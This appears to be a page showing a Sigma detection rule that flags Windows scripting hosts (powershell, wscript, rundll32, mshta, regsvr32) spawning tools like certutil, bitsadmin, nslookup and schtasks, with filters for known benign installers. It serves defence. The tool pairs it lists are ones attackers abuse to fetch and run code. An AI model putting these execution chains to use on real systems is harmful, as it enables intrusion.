Techniques
Sample rules
Windows Shell/Scripting Processes Spawning Suspicious Programs
- source: sigma
- technicques:
- t1059
- t1059.001
- t1059.005
- t1218
Description
Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta…etc.
Detection logic
condition: selection and not 1 of filter_*
filter_amazon:
ParentCommandLine|contains:
- \Program Files\Amazon\WorkSpacesConfig\Scripts\setup-scheduledtask.ps1
- \Program Files\Amazon\WorkSpacesConfig\Scripts\set-selfhealing.ps1
- \Program Files\Amazon\WorkSpacesConfig\Scripts\check-workspacehealth.ps1
- \nessus_
filter_ccmcache:
CurrentDirectory|contains: \ccmcache\
filter_nessus:
CommandLine|contains: \nessus_
filter_sccm_install:
CommandLine|contains|all:
- C:\MEM_Configmgr_
- \SMSSETUP\BIN\
- \autorun.hta
- '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
Image|endswith: \mshta.exe
ParentCommandLine|contains|all:
- C:\MEM_Configmgr_
- \splash.hta
- '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
ParentImage|endswith: \mshta.exe
selection:
Image|endswith:
- \schtasks.exe
- \nslookup.exe
- \certutil.exe
- \bitsadmin.exe
- \mshta.exe
ParentImage|endswith:
- \mshta.exe
- \powershell.exe
- \pwsh.exe
- \rundll32.exe
- \cscript.exe
- \wscript.exe
- \wmiprvse.exe
- \regsvr32.exe